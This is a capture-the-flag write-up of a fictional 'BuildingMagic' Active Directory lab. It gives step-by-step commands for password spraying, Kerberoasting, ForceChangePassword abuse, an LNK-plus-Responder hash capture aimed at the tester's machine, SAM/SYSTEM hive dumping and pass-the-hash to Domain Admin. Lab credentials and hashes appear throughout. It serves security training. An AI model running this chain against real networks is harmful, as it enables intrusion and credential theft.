HackSmarter Lab — BuildingMagic: Active Directory Full Compromise
Scope and Objective
Objective: As a penetration tester on the Hack Smarter Red Team, the goal is to achieve a full compromise of the Active Directory environment — obtaining both user.txt and root.txt.
Initial Access: A prior enumeration phase yielded a leaked database containing usernames and hashed passwords. These credentials serve as the starting point for gaining initial access.
Execution: Leverage the compromised credentials to escalate privileges, move laterally through Active Directory, and fully compromise the domain.
Environment Setup
Step 1 — Connect to the Lab
The lab is accessed over a VPN tunnel provided by HackSmarter. Connecting via OpenVPN assigns us a tun0 interface on the 10.200.25.x subnet, giving us network-level access to the target AD environment.
1
sudo openvpn ad_challenge_lab_bui.ovpn
Step 2 — Configure /etc/hosts
Since we don’t have access to the domain’s internal DNS server yet, we manually map the domain controller’s hostname to its IP address in /etc/hosts. This allows tools like NetExec and Evil-WinRM to resolve buildingmagic.local and dc01.buildingmagic.local correctly without DNS lookups.
1
10.1.231.195 buildingmagic.local dc01.buildingmagic.local
Initial Access — Credential Cracking and Password Spraying
Step 3 — Crack the Leaked Hashes
The leaked database contains MD5 hashed passwords for 10 domain users across various roles within the Building Magic organisation. MD5 is a weak, unsalted algorithm — making these hashes trivially crackable using a wordlist like rockyou.txt or online lookup services.
| Username | Full Name | Role |
|---|---|---|
| r.widdleton | Ron Widdleton | Intern Builder |
| n.bottomsworth | Neville Bottomsworth | Planner |
| l.layman | Luna Layman | Planner |
| c.smith | Chen Smith | Builder |
| d.thomas | Dean Thomas | Builder |
| s.winnigan | Samuel Winnigan | HR Manager |
| p.jackson | Parvati Jackson | Shift Lead |
| b.builder | Bob Builder | Electrician |
| t.ren | Theodore Ren | Safety Officer |
| e.macmillan | Ernest Macmillan | Surveyor |
After cracking, two plaintext passwords are recovered:
lilronronshadowhex7
Step 4 — Password Spraying with NetExec
With valid usernames but uncertain which account maps to which password, we perform a password spray — testing each cracked password against all users. The --continue-on-success flag ensures NetExec doesn’t stop at the first hit, allowing us to identify every valid combination in a single pass. This avoids account lockouts by only trying one password per user at a time.
1
nxc smb buildingmagic.local -u users.txt -p 'lilronron' --continue-on-success
The user r.widdleton successfully authenticates with lilronron. We now have a valid foothold inside the domain as a low-privileged user.
1
nxc smb buildingmagic.local -u 'r.widdleton' -p 'lilronron'
Enumeration — SMB Shares and BloodHound
SMB Share Enumeration
The first thing to do with any domain user is enumerate accessible SMB shares. Even read access to internal shares can expose sensitive files, configurations, or credentials left behind by administrators.
1
nxc smb buildingmagic.local -u 'r.widdleton' -p 'lilronron' --shares
A non-default share stands out: File-Share — described as the “Central Repository of Building Magic’s files.” This is worth revisiting once we have higher-privileged access.
BloodHound AD Enumeration
BloodHound is the go-to tool for visualising Active Directory attack paths. It ingests data collected via LDAP and maps out relationships between users, groups, computers, and ACLs. Even a low-privileged domain user can collect all this data, since LDAP is readable by any authenticated account by default.
1
2
nxc ldap dc01.buildingmagic.local -u 'r.widdleton' -p 'lilronron' \
--bloodhound --collection All --dns-server 10.1.231.195
Analysing r.widdleton in BloodHound shows only default group memberships with no direct privilege escalation paths — a dead end from this account alone.
Privilege Escalation — Kerberoasting
Step 5 — Kerberoasting
Kerberoasting is a technique that abuses the Kerberos authentication protocol. Any domain user can request a Ticket Granting Service (TGS) for any account that has a Service Principal Name (SPN) registered. The TGS is encrypted with the service account’s NTLM hash — meaning we can request it and crack it offline without triggering any alerts on the domain controller.
1
2
nxc ldap dc01.buildingmagic.local -u 'r.widdleton' -p 'lilronron' \
--kerberoasting output.txt
A TGS hash (type $krb5tgs$23) is returned for the r.haggard account. This is a Kerberos 5 RC4-encrypted TGS, which is crackable with hashcat using mode 13100. We crack it offline against rockyou.txt:
1
hashcat output.txt /usr/share/wordlists/rockyou.txt
Cracked password: rubeushagrid
Lateral Movement — ForceChangePassword
Step 6 — Enumerate r.haggard’s Permissions
With r.haggard’s credentials in hand, we authenticate and re-enumerate to understand what this account can access and what privileges it holds in the domain.
1
nxc smb buildingmagic.local -u 'r.haggard' -p 'rubeushagrid' --shares
After marking r.haggard as owned in BloodHound and re-analysing the graph, a critical ACL edge is revealed:
R.HAGGARD has
ForceChangePasswordover H.POTCH — this ACL permission allows changing another user’s password without knowing their current password.
This is a common misconfiguration in AD environments where helpdesk-like roles are granted excessive account management permissions.
Step 7 — Abuse ForceChangePassword
We exploit this ACL using the NetExec change-password module, which performs the password reset over SMB without needing to know h.potch’s current password.
1
2
nxc smb buildingmagic.local -u 'r.haggard' -p 'rubeushagrid' \
-M change-password -o USER=h.potch NEWPASS=hacksmarterisawesome
We verify the new credentials are valid:
1
nxc smb buildingmagic.local -u 'h.potch' -p 'hacksmarterisawesome' --shares
h.potch has READ, WRITE access to the File-Share — a significant upgrade over what we had before.
Credential Capture — LNK File + Responder
Step 8 — Explore the Writable Share
We use smbclient-ng to interactively browse the File-Share and understand its contents:
1
2
smbclientng -u 'h.potch' -p 'hacksmarterisawesome' -d buildingmagic.local \
--host 10.1.231.195
The share is currently empty — but write access opens up an interesting attack vector. If other domain users browse this share (which is common for a “Central Repository”), we can plant a malicious file that forces their machine to authenticate back to us, leaking their NTLM hash.
Step 9 — Deploy LNK File via Slinky Module
A .lnk (shortcut) file can be crafted to point its icon path to a UNC path on our attacker machine (e.g., \\10.200.25.33\share). When any user opens the folder containing the shortcut in Windows Explorer, their system automatically attempts to resolve the icon — triggering an NTLM authentication attempt to our machine. We capture this with Responder.
The NetExec slinky module automates the creation and upload of this malicious LNK file:
1
2
nxc smb buildingmagic.local -u 'h.potch' -p 'hacksmarterisawesome' \
-M slinky -o SERVER=10.200.25.33 NAME=hacksmarter3
With Responder listening on our tun0 interface, we wait for a domain user to browse the share. Shortly after, a NetNTLMv2 hash is captured for h.grangon:
1
2
[SMB] NTLMv2-SSP Username : BUILDINGMAGIC\h.grangon
[SMB] NTLMv2-SSP Hash : h.grangon::BUILDINGMAGIC:2e892b8635e20f7f:...
Step 10 — Crack the NetNTLMv2 Hash
Unlike NTLM hashes, NetNTLMv2 hashes cannot be used directly for Pass-the-Hash. However, they can be cracked offline. Hashcat mode 5600 handles NetNTLMv2:
1
hashcat hash /usr/share/wordlists/rockyou.txt
Cracked password: magic4ever
Initial Foothold — WinRM Shell
Step 11 — Authenticate as h.grangon
We validate the credentials and enumerate share access for this new account:
1
nxc smb buildingmagic.local -u 'h.grangon' -p 'magic4ever' --shares
Reviewing h.grangon in BloodHound reveals membership in the Remote Management Users group. This group grants access to Windows Remote Management (WinRM) on port 5985 — meaning we can get an interactive shell on the domain controller.
Step 12 — WinRM Shell via Evil-WinRM
Evil-WinRM provides a feature-rich WinRM shell with built-in file upload/download, PowerShell script loading, and more:
1
evil-winrm -i buildingmagic.local -u 'h.grangon' -p 'magic4ever'
Capture user.txt
1
2
cd Desktop
cat user.txt
Privilege Escalation — SeBackupPrivilege
Step 13 — Identify SeBackupPrivilege
After landing on the machine, we check what privileges the current user holds:
1
whoami /priv
SeBackupPrivilege is enabled. This Windows privilege was designed to allow backup software to read any file regardless of its DACL permissions — including files normally restricted to SYSTEM or Administrator. Attackers abuse this to read the SAM and SYSTEM registry hives, which contain local account NTLM hashes.
Step 14 — Dump SAM and SYSTEM Hives
We save copies of the SAM and SYSTEM hives from the registry to disk, then download them to our attacker machine using Evil-WinRM’s built-in download command:
1
2
3
4
cd c:\
mkdir Temp
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system
1
2
download system
download sam
Step 15 — Extract NTLM Hashes with Impacket
impacket-secretsdump parses the SAM hive using the SYSTEM hive as a key (needed to decrypt the SAM encryption) and extracts all local account NTLM hashes:
1
impacket-secretsdump -sam sam -system system local
The local Administrator’s NTLM hash is extracted:
1
Administrator:500:aad3b435b51404eeaad3b435b51404ee:520126a03f5d5a8d836f1c4f34ede7ce:::
Domain Compromise — Hash Spraying and Pass-the-Hash
Step 16 — Spray Administrator Hash Across Domain Users
Direct Pass-the-Hash authentication using the Administrator hash against the DC fails — the local Administrator account is not a domain admin. However, in many organisations, administrators reuse the same local administrator password across multiple machines and even domain accounts. We spray the hash against all known domain users to check for this pattern:
1
2
nxc smb buildingmagic.local -u users.txt \
-H 520126a03f5d5a8d836f1c4f34ede7ce --continue-on-success
The hash authenticates successfully as a.flatch — confirming password reuse between the local Administrator account and this domain user.
BloodHound confirms a.flatch is a member of the Domain Admins group — full domain compromise is one step away.
Step 17 — Pass-the-Hash as Domain Admin
Pass-the-Hash allows authenticating with an NTLM hash directly without needing the plaintext password. Evil-WinRM supports this natively with the -H flag:
1
2
evil-winrm -i buildingmagic.local -u 'a.flatch' \
-H 520126a03f5d5a8d836f1c4f34ede7ce
Capture root.txt
1
2
cd C:\Users\Administrator\Desktop
cat root.txt
Domain fully compromised.
Attack Chain Summary
1
2
3
4
5
6
7
8
9
10
Leaked DB (MD5 hashes)
→ Password Spray → r.widdleton (lilronron)
→ Kerberoasting → r.haggard (rubeushagrid)
→ ForceChangePassword ACL → h.potch (hacksmarterisawesome)
→ LNK File + Responder → h.grangon (magic4ever)
→ WinRM Shell → user.txt
→ SeBackupPrivilege → SAM/SYSTEM dump
→ impacket-secretsdump → Administrator NTLM hash
→ Hash Spray → a.flatch (password reuse)
→ Pass-the-Hash → Domain Admin → root.txt
Tools Used
| Tool | Purpose |
|---|---|
| NetExec (nxc) | SMB/LDAP enumeration, password spraying, Kerberoasting, modules |
| Hashcat | Offline hash cracking (MD5, Kerberos TGS, NetNTLMv2) |
| BloodHound | AD attack path visualisation and ACL analysis |
| smbclient-ng | Interactive SMB share browsing |
| Responder | NetNTLMv2 hash capture via LLMNR/NBT-NS poisoning |
| Evil-WinRM | WinRM shell with file transfer support |
| Impacket secretsdump | SAM/SYSTEM hive parsing and hash extraction |